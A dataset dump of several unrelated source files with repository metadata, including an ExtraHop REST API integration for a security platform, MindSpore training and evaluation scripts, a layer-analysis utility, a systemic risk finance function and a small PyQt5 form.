USE_SSL = not demisto.params().get('insecure', False)
BASE_URL = SERVER + '/api/v1/'
HEADERS = {
'Accept': 'application/json',
'Authorization': 'ExtraHop apikey={key}'.format(key=APIKEY)
}
if not demisto.params().get('proxy'):
    # pop() with a default avoids a KeyError when a variable is not set
    os.environ.pop('HTTP_PROXY', None)
    os.environ.pop('HTTPS_PROXY', None)
    os.environ.pop('http_proxy', None)
    os.environ.pop('https_proxy', None)
# 'response' is a container for paginated results
response = []
''' HELPER FUNCTIONS '''
def http_request(method, url_suffix, data=None, payload=None):
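    """Thin wrapper around requests for the ExtraHop REST API.

    Returns the raw Response object. Connection failures and unexpected
    status codes are reported via return_error; a 204 status is reported
    as a successful modification directly.
    """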
data = json.dumps(data)
try:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
data=data,
headers=HEADERS,
params=payload
)
    except requests.exceptions.RequestException:  # connection-level failure (DNS, timeout, refused connection)
return_error('Failed to connect to - {url} - Please check the URL'.format(url=BASE_URL))
# Handle error responses gracefully
if res.status_code == 204:
return demisto.results('Successful Modification')
elif res.status_code not in {200, 204, 201}:
return_error('Error in API call to ExtraHop {code} - {reason}'.format(code=res.status_code, reason=res.reason))
return res
''' COMMANDS + REQUESTS FUNCTIONS '''
def test_module():
"""
Performs basic get request to check ExtraHop version
"""
test_result = http_request('GET', 'extrahop')
return test_result
def get_alerts():
res_raw = http_request('GET', 'alerts')
res = res_raw.json()
return res
def paginate(can_paginate, cursor):
    # Follow the cursor returned by the records API until no cursor remains,
    # accumulating each page in the module-level 'response' list. A plain loop
    # (rather than recursing inside the loop) requests each cursor exactly once.
    while can_paginate is True:
        body = {
            "cursor": cursor,
            "context_ttl": 400000
        }
        res_raw = http_request('POST', 'records/cursor', body)
        res = res_raw.json()
        response.append(res)
        if 'cursor' in res:
            cursor = res['cursor']
        else:
            break
    return response
def query_records(field, value, operator, query_from, limit):
data = {
"filter": {
"field": str(field),
"operand": str(value),
"operator": str(operator)
},
"from": int(query_from),
"limit": int(limit)
}
res_raw = http_request('POST', 'records/search', data)
res = res_raw.json()
response.append(res)
if 'cursor' in res:
response.append(paginate(True, res['cursor']))
return response
def devices():
active_from = demisto.args().get('active_from')
active_until = demisto.args().get('active_until')
search_type = demisto.args().get('search_type')
limit = demisto.args().get('limit')
payload = {}
if active_from:
payload['active_from'] = active_from
if active_until:
payload['active_until'] = active_until
if limit:
payload['limit'] = limit
payload['search_type'] = search_type
res_raw = http_request('GET', 'devices', data=None, payload=payload)
res = res_raw.json()
return res
def format_alerts(alerts):
hr = ''
ec = {
"ExtraHop": {
"Alert": []
}
} # type: dict
for alert in alerts:
hr += tableToMarkdown('Found Alert', alert, headerTransform=string_to_table_header, removeNull=True)
ec['ExtraHop']['Alert'].append(createContext(alert, keyTransform=string_to_context_key, removeNull=True))
if len(alerts) == 0:
demisto.results('No results were found')
else:
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': alerts,
'HumanReadable': hr,
'EntryContext': ec
})
def format_device_results(data):
hr_table = []
ec = {
"ExtraHop": {
"Device": []
}
} # type: dict
for device in data:
hr = {}
if 'id' in device:
hr['ID'] = device.get('id')
if 'display_name' in device:
hr['Display Name'] = device.get('display_name')
if 'ipaddr4' in device:
hr['IP Address'] = device.get('ipaddr4')
if 'macaddr' in device:
hr['MAC Address'] = device.get('macaddr')
if 'vendor' in device:
hr['Vendor'] = device.get('vendor')
hr_table.append(hr)
ec['ExtraHop']['Device'].append(createContext(device, keyTransform=string_to_context_key, removeNull=True))
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': data,
'HumanReadable': tableToMarkdown('Devices Found', hr_table),
'EntryContext': ec
})
def whitelist_modify(add, remove):
assignments = {}
if add:
add_items = add.split(',')
add_items = list(map(int, add_items))
assignments['assign'] = add_items
if remove:
remove_items = remove.split(',')
remove_items = list(map(int, remove_items))
assignments['unassign'] = remove_items
res = http_request('POST', 'whitelist/devices', data=assignments)
return res
def whitelist_retrieve():
res_raw = http_request('GET', 'whitelist/devices')
res = res_raw.json()
return res
def add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2, alert_id=None):
data = {
"apply_all": apply_all,
"disabled": disabled,
"name": name,
"notify_snmp": notify_snmp,
"refire_interval": int(refire_interval),
"severity": int(severity),
"type": alert_type
}
if alert_type == 'detection':
data['object_type'] = object_type
data['protocols'] = [str(protocols)]
elif alert_type == 'threshold':
data['field_name'] = field_name
data['stat_name'] = stat_name
data['units'] = units
data['interval_length'] = int(interval_length)
data['operand'] = operand
data['operator'] = operator
if demisto.args().get('field_name2'):
data['field_name2'] = field_name2
if demisto.args().get('field_op'):
data['field_op'] = field_op
if demisto.args().get('param'):
data['param'] = param
if demisto.args().get('param2'):
data['param2'] = param2
if alert_id:
method = 'PATCH'
url_suffix = 'alerts/{alert_id}'.format(alert_id=alert_id)
else:
method = 'POST'
url_suffix = 'alerts'
data = json.dumps(data)
try:
res = requests.request(
method,
BASE_URL + url_suffix,
verify=USE_SSL,
data=data,
headers=HEADERS
)
    except requests.exceptions.RequestException:  # connection-level failure (DNS, timeout, refused connection)
return_error('Failed to connect to - {url} - Please check the URL'.format(url=BASE_URL))
# Handle error responses gracefully
if res.status_code == 204:
return demisto.results('Successful Modification')
if res.status_code == 400:
resp = res.json()
return_error('Error in request format - {message}'.format(message=resp['error_message']))
if res.status_code == 201:
return demisto.results('Alert successfully added')
elif res.status_code not in {200, 204, 201}:
return_error('Error in API call to ExtraHop {code} - {reason}'.format(code=res.status_code, reason=res.reason))
return res
def add_alert_command():
apply_all = bool(strtobool(demisto.args().get('apply_all', False)))
disabled = bool(strtobool(demisto.args().get('disabled', False)))
name = demisto.args().get('name')
notify_snmp = bool(strtobool(demisto.args().get('notify_snmp', False)))
field_name = demisto.args().get('field_name')
stat_name = demisto.args().get('stat_name')
units = demisto.args().get('units')
interval_length = demisto.args().get('interval_length')
operand = demisto.args().get('operand')
refire_interval = demisto.args().get('refire_interval')
severity = demisto.args().get('severity')
alert_type = demisto.args().get('type')
object_type = demisto.args().get('object_type')
protocols = demisto.args().get('protocols')
operator = demisto.args().get('operator')
field_name2 = demisto.args().get('field_name2')
field_op = demisto.args().get('field_op')
param = demisto.args().get('param')
param2 = demisto.args().get('param2')
add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2)
def modify_alert_command():
alert_id = demisto.args().get('alert_id')
apply_all = bool(strtobool(demisto.args().get('apply_all', False)))
disabled = bool(strtobool(demisto.args().get('disabled', False)))
name = demisto.args().get('name')
notify_snmp = bool(strtobool(demisto.args().get('notify_snmp', False)))
field_name = demisto.args().get('field_name')
stat_name = demisto.args().get('stat_name')
units = demisto.args().get('units')
interval_length = demisto.args().get('interval_length')
operand = demisto.args().get('operand')
refire_interval = demisto.args().get('refire_interval')
severity = demisto.args().get('severity')
alert_type = demisto.args().get('type')
object_type = demisto.args().get('object_type')
protocols = demisto.args().get('protocols')
operator = demisto.args().get('operator')
field_name2 = demisto.args().get('field_name2')
field_op = demisto.args().get('field_op')
param = demisto.args().get('param')
param2 = demisto.args().get('param2')
add_alert(apply_all, disabled, name, notify_snmp, refire_interval, severity, alert_type, object_type,
protocols, field_name, stat_name, units, interval_length, operand, operator, field_name2, field_op,
param, param2, alert_id)
def get_alerts_command():
res = get_alerts()
format_alerts(res)
def whitelist_modify_command():
add = demisto.args().get('add')
remove = demisto.args().get('remove')
whitelist_modify(add, remove)
def query_records_command():
field = demisto.args().get('field')
value = demisto.args().get('value')
operator = demisto.args().get('operator')
query_from = demisto.args().get('query_from')
limit = demisto.args().get('limit')
res = query_records(field, value, operator, query_from, limit)
source = res[0]['records']
hr = ''
ec = {
"ExtraHop": {
"Query": []
}
} # type: dict
for record in source:
hr += tableToMarkdown('Incident result for ID {id}'.format(id=record['_id']), record['_source'])
ec['ExtraHop']['Query'].append(createContext(record, keyTransform=string_to_context_key, removeNull=True))
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['markdown'],
'Contents': source,
'HumanReadable': hr,
'EntryContext': createContext(ec, removeNull=True)
})
def whitelist_retrieve_command():
res = whitelist_retrieve()
if len(res) == 0:
demisto.results('No devices found in whitelist')
elif len(res) > 0:
format_device_results(res)
def devices_command():
found_devices = devices()
format_device_results(found_devices)
''' COMMANDS MANAGER / SWITCH PANEL '''
LOG('Command being called is {command}'.format(command=demisto.command()))
try:
if demisto.command() == 'test-module':
test_module()
demisto.results('ok')
elif demisto.command() == 'extrahop-get-alert-rules':
get_alerts_command()
elif demisto.command() == 'extrahop-query':
query_records_command()
elif demisto.command() == 'extrahop-devices':
devices_command()
elif demisto.command() == 'extrahop-whitelist-modify':
whitelist_modify_command()
elif demisto.command() == 'extrahop-whitelist-retrieve':
whitelist_retrieve_command()
elif demisto.command() == 'extrahop-add-alert-rule':
add_alert_command()
elif demisto.command() == 'extrahop-modify-alert-rule':
modify_alert_command()
# Log exceptions
except Exception as e:
LOG(str(e))
LOG.print_log()
raise
| 33.608808 | 119 | 0.627303 |
c3102986968c8d96ec77eb7a8b056ee5824f8732
| 6,791 |
py
|
Python
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/efficientnet-b0/train.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""train efficientnet."""
import os
import ast
import argparse
from mindspore import context
from mindspore import Tensor
from mindspore.nn import SGD, RMSProp
from mindspore.context import ParallelMode
from mindspore.train.model import Model
from mindspore.train.callback import ModelCheckpoint, CheckpointConfig
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.communication.management import init
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.common import dtype as mstype
from mindspore.common import set_seed
from src.lr_generator import get_lr
from src.models.effnet import EfficientNet
from src.config import config
from src.monitor import Monitor
from src.dataset import create_dataset
from src.loss import CrossEntropySmooth
set_seed(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='image classification training')
# modelarts parameter
parser.add_argument('--data_url', type=str, default=None, help='Dataset path')
parser.add_argument('--train_url', type=str, default=None, help='Train output path')
# Ascend parameter
parser.add_argument('--dataset_path', type=str, default=None, help='Dataset path')
parser.add_argument('--run_distribute', type=ast.literal_eval, default=False, help='Run distribute')
parser.add_argument('--device_id', type=int, default=0, help='Device id')
parser.add_argument('--run_modelarts', type=ast.literal_eval, default=False, help='Run mode')
parser.add_argument('--resume', type=str, default='', help='resume training with existed checkpoint')
args_opt = parser.parse_args()
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
# init distributed
if args_opt.run_modelarts:
import moxing as mox
device_id = int(os.getenv('DEVICE_ID'))
device_num = int(os.getenv('RANK_SIZE'))
context.set_context(device_id=device_id)
local_data_url = '/cache/data'
local_train_url = '/cache/ckpt'
if device_num > 1:
init()
context.set_auto_parallel_context(device_num=device_num, parallel_mode='data_parallel', gradients_mean=True)
local_data_url = os.path.join(local_data_url, str(device_id))
mox.file.copy_parallel(args_opt.data_url, local_data_url)
else:
if args_opt.run_distribute:
device_id = int(os.getenv('DEVICE_ID'))
device_num = int(os.getenv('RANK_SIZE'))
context.set_context(device_id=device_id)
init()
context.reset_auto_parallel_context()
context.set_auto_parallel_context(device_num=device_num,
parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
else:
context.set_context(device_id=args_opt.device_id)
device_num = 1
device_id = 0
# define network
net = EfficientNet(1, 1)
net.to_float(mstype.float16)
# define loss
if not config.use_label_smooth:
config.label_smooth_factor = 0.0
loss = CrossEntropySmooth(smooth_factor=config.label_smooth_factor, num_classes=config.class_num)
# define dataset
if args_opt.run_modelarts:
dataset = create_dataset(dataset_path=local_data_url,
do_train=True,
batch_size=config.batch_size,
device_num=device_num, rank=device_id)
else:
dataset = create_dataset(dataset_path=args_opt.dataset_path,
do_train=True,
batch_size=config.batch_size,
device_num=device_num, rank=device_id)
step_size = dataset.get_dataset_size()
# resume
if args_opt.resume:
ckpt = load_checkpoint(args_opt.resume)
load_param_into_net(net, ckpt)
# get learning rate
loss_scale = FixedLossScaleManager(config.loss_scale, drop_overflow_update=False)
lr = Tensor(get_lr(lr_init=config.lr_init,
lr_end=config.lr_end,
lr_max=config.lr_max,
warmup_epochs=config.warmup_epochs,
total_epochs=config.epoch_size,
steps_per_epoch=step_size,
lr_decay_mode=config.lr_decay_mode))
    # define optimizer
if config.opt == 'sgd':
optimizer = SGD(net.trainable_params(), learning_rate=lr, momentum=config.momentum,
weight_decay=config.weight_decay, loss_scale=config.loss_scale)
elif config.opt == 'rmsprop':
optimizer = RMSProp(net.trainable_params(), learning_rate=lr, decay=0.9, weight_decay=config.weight_decay,
momentum=config.momentum, epsilon=config.opt_eps, loss_scale=config.loss_scale)
# define model
model = Model(net, loss_fn=loss, optimizer=optimizer, loss_scale_manager=loss_scale,
metrics={'acc'}, amp_level='O3')
# define callbacks
cb = [Monitor(lr_init=lr.asnumpy())]
if config.save_checkpoint and (device_num == 1 or device_id == 0):
config_ck = CheckpointConfig(save_checkpoint_steps=config.save_checkpoint_epochs * step_size,
keep_checkpoint_max=config.keep_checkpoint_max)
if args_opt.run_modelarts:
ckpt_cb = ModelCheckpoint(f"Efficientnet_b0-rank{device_id}", directory=local_train_url, config=config_ck)
else:
save_ckpt_path = os.path.join(config.save_checkpoint_path, 'model_' + str(device_id) + '/')
ckpt_cb = ModelCheckpoint(f"Efficientnet_b0-rank{device_id}", directory=save_ckpt_path, config=config_ck)
cb += [ckpt_cb]
    # begin training
model.train(config.epoch_size, dataset, callbacks=cb)
if args_opt.run_modelarts and config.save_checkpoint and (device_num == 1 or device_id == 0):
mox.file.copy_parallel(local_train_url, args_opt.train_url)
| 44.97351 | 120 | 0.674864 |
c332a73bfc6e3ef3ebb75d2e00f603936d77704f
| 3,440 |
py
|
Python
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 794 |
2018-09-06T07:38:41.000Z
|
2022-03-16T06:30:37.000Z
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 111 |
2018-12-04T11:18:27.000Z
|
2022-03-31T07:39:11.000Z
|
analysis/utils.py
|
JasperMorrison/PytorchToCaffe
|
04f0066cdc8a9da92591d7361907c3ea53271707
|
[
"MIT"
] | 221 |
2018-11-22T08:11:03.000Z
|
2022-03-16T07:11:43.000Z
|
import csv,pprint
from .layers import Base
def get_human_readable(num):
units=['','K','M','G','T','P']
idx=0
while .001*num>1:
num=.001*num
idx+=1
if idx>=len(units):
return '%.3e'%num
return '%.3f'%num+units[idx]
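# Worked examples: get_human_readable(2048) -> '2.048K' and
# get_human_readable(1234567) -> '1.235M'; values below 1000 keep no unit suffix.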
def save_csv(layers,csv_save_path='/tmp/analyse.csv',
save_items=('name', 'layer_info', 'input', 'out', 'dot', 'add', 'compare','ops', 'weight_size','activation_size'),
print_detail=True,human_readable=True):
# layers = get_layer_blox_from_blobs(blobs)
print_list = []
sum=[0]*len(save_items)
for layer in layers:
print_line=[]
for idx,param in enumerate(save_items):
item=getattr(layer, param)
if type(item)==list:
s=''
for i in item:
s+=' '+str(i)
else:
s=str(item)
try:
num=int(item)
sum[idx]+=num
except:pass
print_line.append(s)
print_list.append(print_line)
if print_detail:
sum[0] = 'SUM'
print_list.append(sum)
print_table(print_list,save_items)
else:
print_list=[]
for idx,item in enumerate(sum):
if item>0:
if human_readable:
print_list.append('%s:%s' % (save_items[idx], get_human_readable(item)))
else:
print_list.append('%s:%.3e'%(save_items[idx],item))
print(print_list)
    if csv_save_path is not None:
        with open(csv_save_path, 'w') as file:
            writer = csv.writer(file)
            writer.writerow(save_items)
            for row in print_list:
                # summary rows are plain strings; wrap them so csv.writer
                # does not split them into one column per character
                writer.writerow(row if isinstance(row, (list, tuple)) else [row])
        print('saved at {}!'.format(csv_save_path))
def get_layer_blox_from_blobs(blobs):
layers=[]
def creator_search(blob):
for father in blob.father:
if isinstance(father,Base) and father not in layers:
layers.append(father)
if father.muti_input==True:
for input in father.input:
creator_search(input)
else:
creator_search(father.input)
for blob in blobs:
creator_search(blob)
return layers
def print_table(datas,names):
types=[]
for i in datas[0]:
try:
i=int(float(i))
types.append('I')
except:
types.append('S')
for l in datas:
s=''
for i,t in zip(l,types):
if t=='I':
i=int(float(i))
s+=('%.1E'%i).center(10)
else:
i=str(i)
if len(i)>20:
i=i[:17]+'...'
s+=i.center(20)
s+='|'
print(s)
s = ''
for i,t in zip(names,types):
if t == 'I':
s += i.center(10)
else:
if len(i) > 20:
i = i[:17] + '...'
s += i.center(20)
s += '|'
print(s)
def print_by_blob(blobs,print_items=('name', 'layer_info', 'input', 'out', 'dot', 'add', 'compare','ops', 'weight_size','activation_size')):
layers=get_layer_blox_from_blobs(blobs)
print_list = []
for layer in layers:
print_list.append([str(getattr(layer, param)) for param in print_items])
pprint.pprint(print_list, depth=3, width=200)
return print_list
| 30.442478 | 140 | 0.505233 |
c344cbe87e4f07a88247dbd5d8bd50cf1ca23052
| 3,231 |
py
|
Python
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/DBPN/eval.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""DBPN test"""
import argparse
import ast
import time
from mindspore import load_checkpoint, load_param_into_net, context
from src.dataset.dataset import DatasetVal, create_val_dataset
from src.model.generator import get_generator
from src.util.utils import compute_psnr, save_img
parser = argparse.ArgumentParser(description="DBPN eval")
parser.add_argument("--device_id", type=int, default=4, help="device id, default: 0.")
parser.add_argument("--val_GT_path", type=str, default=r'/data/DBPN_data/Set5/HR')
parser.add_argument("--val_LR_path", type=str, default=r'/data/DBPN_data/Set5/LR')
parser.add_argument("--ckpt", type=str, default=r'ckpt/gen/DDBPN_best.ckpt')
parser.add_argument('--upscale_factor', type=int, default=4, choices=[2, 4, 8],
help="Super resolution upscale factor")
parser.add_argument('--model_type', type=str, default='DDBPN', choices=["DBPNS", "DDBPN", "DBPN", "DDBPNL"])
parser.add_argument('--vgg', type=ast.literal_eval, default=True, help="use vgg")
parser.add_argument('--isgan', type=ast.literal_eval, default=False, help="is_gan decides the way of training ")
parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
parser.add_argument('--save_eval_path', type=str, default="./Results/eval", help='save eval image path')
args = parser.parse_args()
print(args)
def predict(ds, model):
"""predict
Args:
ds(Dataset): eval dataset
model(Cell): the generate model
"""
for index, batch in enumerate(ds.create_dict_iterator(), 1):
lr = batch['input_image']
hr = batch['target_image']
t0 = time.time()
prediction = model(lr)
psnr_value = compute_psnr(prediction.squeeze(), hr.squeeze())
t1 = time.time()
print("lr shape", lr.shape)
print("hr shape", hr.shape)
print("prediction shape", prediction.shape)
print("===> Processing: {} compute_psnr:{:.4f}|| Timer: {:.2f} sec.".format(index, psnr_value, (t1 - t0)))
save_img(prediction, str(index), args.save_eval_path)
if __name__ == "__main__":
context.set_context(mode=context.GRAPH_MODE, device_id=args.device_id)
val_dataset = DatasetVal(args.val_GT_path, args.val_LR_path, args)
val_ds = create_val_dataset(val_dataset, args)
print("=======> load model ckpt")
params = load_checkpoint(args.ckpt)
print('===> Building model ', args.model_type)
netG = get_generator(args.model_type, scale_factor=args.upscale_factor)
load_param_into_net(netG, params)
predict(val_ds, netG)
| 43.662162 | 114 | 0.696069 |
c35ff05ae649adfc8d474a5f59af68f95b5a41df
| 5,385 |
py
|
Python
|
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 31 |
2020-06-17T13:19:12.000Z
|
2022-03-27T08:56:38.000Z
|
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | null | null | null |
frds/measures/func_ses.py
|
mgao6767/wrds
|
7dca2651a181bf38c61ebde675c9f64d6c96f608
|
[
"MIT"
] | 8 |
2020-06-14T15:21:51.000Z
|
2021-09-29T06:28:53.000Z
|
import numpy as np
def systemic_expected_shortfall(
mes_training_sample: np.ndarray,
lvg_training_sample: np.ndarray,
ses_training_sample: np.ndarray,
mes_firm: float,
lvg_firm: float,
) -> float:
r"""Systemic Expected Shortfall (SES)
A measure of a financial institution's contribution to a systemic crisis by
[Acharya, Pedersen, Philippon, and Richardson (2017)](https://doi.org/10.1093/rfs/hhw088), which equals to
the expected amount a bank is undercapitalized in a future systemic event in which the overall financial system is undercapitalized.
SES increases in the bank’s expected losses during a crisis, and is related to the bank's
[marginal expected shortfall (MES)](/measures/marginal_expected_shortfall/),
i.e., its losses in the tail of the aggregate sector’s loss distribution, and leverage.
SES is a theoretical construct and the authors use the following 3 measures to proxy it:
1. The outcome of stress tests performed by regulators. The SES metric of a firm here is defined as the recommended capital that
it was required to raise as a result of the stress test in February 2009.
2. The decline in equity valuations of large financial firms during the crisis, as measured by their cumulative equity return
from July 2007 to December 2008.
3. The widening of the credit default swap spreads of large financial firms as measured by their cumulative CDS spread increases
from July 2007 to December 2008.
Given these proxies, the authors seek to develop leading indicators which “predict” an institution’s SES, including
marginal expected shortfall (MES) and leverage (LVG).
!!! note
Since SES is a theoretical construct, this function estimates the **fitted SES** following Bisias, Flood, Lo, and Valavanis (2012).
Specifically, the following model is estimated:
$$
\textit{realized SES}_{i,\textit{crisis}} = a + b MES_{i,\textit{pre-crisis}} + c LVG_{i,\textit{pre-crisis}} + \varepsilon_{i}
$$
where $\textit{realized SES}_{i,\textit{crisis}}$ is the stock return during the crisis, and $LVG_{i,\textit{pre-crisis}}$ is
defined as $(\text{book assets - book equity + market equity}) / \text{market equity}$.
The fitted SES is computed as
$$
\textit{fitted SES} = \frac{b}{b+c} MES + \frac{c}{b+c} LVG
$$
??? note "Model in Acharya, Pedersen, Philippon, and Richardson (2017)"
        In Acharya, Pedersen, Philippon, and Richardson (2017), fitted SES is obtained by estimating the model:
        $$
        \textit{realized SES}_{i,\textit{crisis}} = a + b MES_{i,\textit{pre-crisis}} + c LVG_{i,\textit{pre-crisis}} + \text{industry dummies} + \varepsilon_{i}
$$
and calculating the fitted value of $\textit{realized SES}_{i}$ directly, where
        the industry dummies include indicators for whether the bank is a broker-dealer, an insurance company, or other.
See Model 6 in Table 4 (p.23) and Appendix C.
Args:
mes_training_sample (np.ndarray): (n_firms,) array of firm ex ante MES.
lvg_training_sample (np.ndarray): (n_firms,) array of firm ex ante LVG (say, on the last day of the period of training data)
ses_training_sample (np.ndarray): (n_firms,) array of firm ex post cumulative return for date range after `lvg_training_sample`.
mes_firm (float): The current firm MES used to calculate the firm (fitted) SES value.
lvg_firm (float): The current firm leverage used to calculate the firm (fitted) SES value.
Returns:
float: The systemic risk that firm $i$ poses to the system at a future time.
Examples:
>>> from frds.measures import systemic_expected_shortfall
>>> import numpy as np
>>> mes_training_sample = np.array([-0.023, -0.07, 0.01])
>>> lvg_training_sample = np.array([1.8, 1.5, 2.2])
>>> ses_training_sample = np.array([0.3, 0.4, -0.2])
>>> mes_firm = 0.04
>>> lvg_firm = 1.7
>>> systemic_expected_shortfall(mes_training_sample, lvg_training_sample, ses_training_sample, mes_firm, lvg_firm)
-0.33340757238306845
References:
* [Acharya, Pedersen, Philippon, and Richardson (2017)](https://doi.org/10.1093/rfs/hhw088),
Measuring systemic risk, *The Review of Financial Studies*, 30, (1), 2-47.
* [Bisias, Flood, Lo, and Valavanis (2012)](https://doi.org/10.1146/annurev-financial-110311-101754),
A survey of systemic risk analytics, *Annual Review of Financial Economics*, 4, 255-296.
See Also:
Systemic risk measures:
* [Absorption Ratio](/measures/absorption_ratio/)
* [Contingent Claim Analysis](/measures/cca/)
* [Distress Insurance Premium](/measures/distress_insurance_premium/)
* [Marginal Expected Shortfall (MES)](/measures/marginal_expected_shortfall/)
"""
assert mes_training_sample.shape == lvg_training_sample.shape
assert mes_training_sample.shape == ses_training_sample.shape
n_firms = mes_training_sample.shape
data = np.vstack([np.ones(n_firms), mes_training_sample, lvg_training_sample]).T
betas = np.linalg.lstsq(data, ses_training_sample, rcond=None)[0]
_, b, c = betas
ses = (b * mes_firm + c * lvg_firm) / (b + c)
return ses
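# Design note: dividing the OLS slopes b and c by (b + c) makes the MES and LVG
# weights sum to one, so the fitted SES is the weighted combination
# w * mes_firm + (1 - w) * lvg_firm with w = b / (b + c); the intercept is discarded.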
| 49.861111 | 162 | 0.689322 |
5b07aa8c7b630fc27e0d846cd78d21e4d0b33230
| 798 |
py
|
Python
|
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
BtmManager-Prototyp-py/Gui_ui/test.py
|
datend3nker/JuFo-BtM
|
a01e931ec4862c12e8a4861eed0661806ee2d19e
|
[
"BSD-Source-Code"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'test.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(400, 300)
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(160, 150, 47, 13))
self.label.setObjectName("label")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "test only"))
| 28.5 | 62 | 0.672932 |
82d3741631b32b5825f7e8be517a88780626b771
| 786 |
py
|
Python
|
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
tarefas-poo/lista-02/processa-numeros/view/paineis/painel_primeiro_e_ultimo.py
|
victoriaduarte/POO_UFSC
|
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
|
[
"MIT"
] | null | null | null |
# --------------------------
# UFSC - CTC - INE - INE5603
# "Process Numbers" exercise
# --------------------------
# Class responsible for finding the first and the last number.
from view.paineis.painel_abstrato import PainelAbstrato
from model.processa_numeros import primeiro_e_ultimo
class PainelPrimeiroEUltimo(PainelAbstrato):
def __init__(self):
super().__init__('Primeiro e Último')
def interaja(self):
numeros = self._leiaints()
resposta = primeiro_e_ultimo(numeros)
if resposta is None:
msg = 'Não dá para encontrar porque a lista {} tem menos de 2 números'.format(numeros)
else:
msg = 'Para a lista {} o primeiro é o {} e último é o {}'.format(numeros, resposta[0], resposta[1])
print(msg)
| 35.727273 | 111 | 0.632316 |
7d87dfad7a60725b9a20577262f40d0821fdc251
| 2,348 |
py
|
Python
|
src/onegov/wtfs/views/report.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/wtfs/views/report.py
|
